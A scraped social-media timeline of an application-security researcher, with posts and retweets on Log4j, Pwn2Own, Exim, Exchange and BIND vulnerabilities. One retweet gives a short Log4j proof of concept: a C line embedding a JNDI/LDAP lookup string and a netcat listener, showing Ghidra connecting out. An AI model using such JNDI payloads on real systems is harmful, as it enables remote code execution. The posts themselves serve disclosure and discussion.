Siva Siva

864 posts

Siva Siva banner
Siva Siva

Siva Siva

@zebasquared

App Sec @doordash former @okta @thezdi @TrendMicroRSRCH

Toronto Katılım Şubat 2014
419 Takip Edilen452 Takipçiler
Siva Siva
Siva Siva@zebasquared·
uhmm what's going on at @Microsoft, their login experience has been broken for over 24 hours now. The comms team seems to have declared victory and moved on? Am I overreacting, or is this unusually long? I don’t recall problems like this dragging on in the past.
Siva Siva tweet media
Microsoft 365 Status@MSFT365Status

We’ve confirmed service health has returned to normal and reporting users that have completed the additional steps are able to access Outlook and Hotmail. For the list of mitigation steps and more information, please review the attached screenshot or visit status.cloud.microsoft > Microsoft consumer products > Outlook.com.

English
1
0
1
651
Microsoft 365 Status
Microsoft 365 Status@MSFT365Status·
We’ve confirmed service health has returned to normal and reporting users that have completed the additional steps are able to access Outlook and Hotmail. For the list of mitigation steps and more information, please review the attached screenshot or visit status.cloud.microsoft > Microsoft consumer products > Outlook.com.
Microsoft 365 Status tweet media
English
517
13
69
92.4K
TrendAI Zero Day Initiative
Boom! It takes @abdhariri less than 15 seconds to kick off #Pwn2Own Vancouver with a successful exploit of #Adobe Reader on macOS. He's off to the disclosure room to discuss the details of his research.
TrendAI Zero Day Initiative tweet media
English
7
30
178
37.8K
Siva Siva retweetledi
Thracky
Thracky@thracky·
Who knew if an attacker can modify your app configs that it could lead to bad things? ¯\_(ツ)_/¯
English
0
1
1
0
Siva Siva retweetledi
Alvaro Muñoz
Alvaro Muñoz@pwntester·
If developers dont know that untrustred data should not be passed to a JNDI lookup op then WE (the security community) have failed them. Its not THEIR fault
an0n@an0n_r0

from @BlackHatEvents USA 2016: A Journey From #JNDI/LDAP Manipulation to Remote Code Execution Dream Land by @pwntester and @olekmirosh blackhat.com/docs/us-16/mat… now the exploit vector presented in 2016 is the #log4jRCE. attached slide #11 from the presentation below. :)

English
4
51
186
0
Siva Siva retweetledi
Filippo Valsorda @filippo.abyssdomain.expert
This is the maintainer who fixed the vulnerability that's causing millions(++?) of dollars of damage. "I work on Log4j in my spare time" "always dreamed of working on open source full time" "3 sponsors are funding @rgoers's work: Michael, Glenn, Matt" People, what are we doing.
Filippo Valsorda @filippo.abyssdomain.expert tweet media
English
33
975
2.9K
0
Siva Siva retweetledi
Zhuowei Zhang
Zhuowei Zhang@zhuowei·
Ghidra's vulnerable to log4j: __attribute__((__section__(".note.${jndi:ldap://127.0.0.1:1234/abc}"))) int a = 1; int main(){} $ gcc hello.c $ nc -l 1234 Load into Ghidra; it connects to 127.0.0.1:1234. Ghidra 10.0.2, macOS OpenJDK Corretto 11.0.4.11.1 drive.google.com/file/d/1TRx7La…
English
10
265
956
0
Siva Siva
Siva Siva@zebasquared·
@pyn3rd Woah I didn’t realize that this finding was from your team. Great finding!
English
0
0
1
0
Siva Siva retweetledi
ronka
ronka@epsilan·
#OBTS was just surreal. many thanks to everyone for the warm reception, you can find my slides detailing the story behind 5 app/macro sandbox escapes stemming from one root cause here: github.com/ronwai/talks/b…
ronka tweet media
English
3
9
39
0
Siva Siva retweetledi
ronka
ronka@epsilan·
honoured to speak alongside so many brilliant folks at #OBTS v4 #Environmental%20Disaster" target="_blank" rel="nofollow noopener">objectivebythesea.com/v4/talks.html#… see y'all in Maui!! 🏖️🌴
English
0
1
3
0
Thracky
Thracky@thracky·
@zebasquared I’ll just say it involves Java and you can probably at least figure out the vendor 😛
English
1
0
1
0
Thracky
Thracky@thracky·
Ahahaha an infinite loop with a GET request or a POST with content-length of 0. 1 request = 1 core pegged at 100%.
English
1
0
1
0
Siva Siva
Siva Siva@zebasquared·
@thracky 🤦 are you allowed to disclose the product?
English
1
0
0
0
Siva Siva retweetledi
Qualys
Qualys@qualys·
Qualys Research Team discovered 21 severe vulnerabilities in Exim, the mail transfer agent (MTA) responsible for 60% of internet mail traffic. #21Nails could allow a remote attacker to gain full root privileges on the target server & execute commands. blog.qualys.com/vulnerabilitie…
Qualys tweet media
English
6
147
210
0
Siva Siva retweetledi
Janggggg
Janggggg@testanull·
I just published Microsoft Exchange From Deserialization to Post-Auth RCE (CVE-2021–28482) link.medium.com/a2T3FpCjLfb
English
6
262
647
0
Siva Siva retweetledi
TrendAI Zero Day Initiative
Looking for an unauthenticated RCE in #BIND? How about one that's been around for 15 years? An anonymous researcher submitted just that to ZDI, and @_wmliang_ has a full analysis of this now patched bug. Read the details then patch. bit.ly/2ZPIGDd
English
0
51
126
0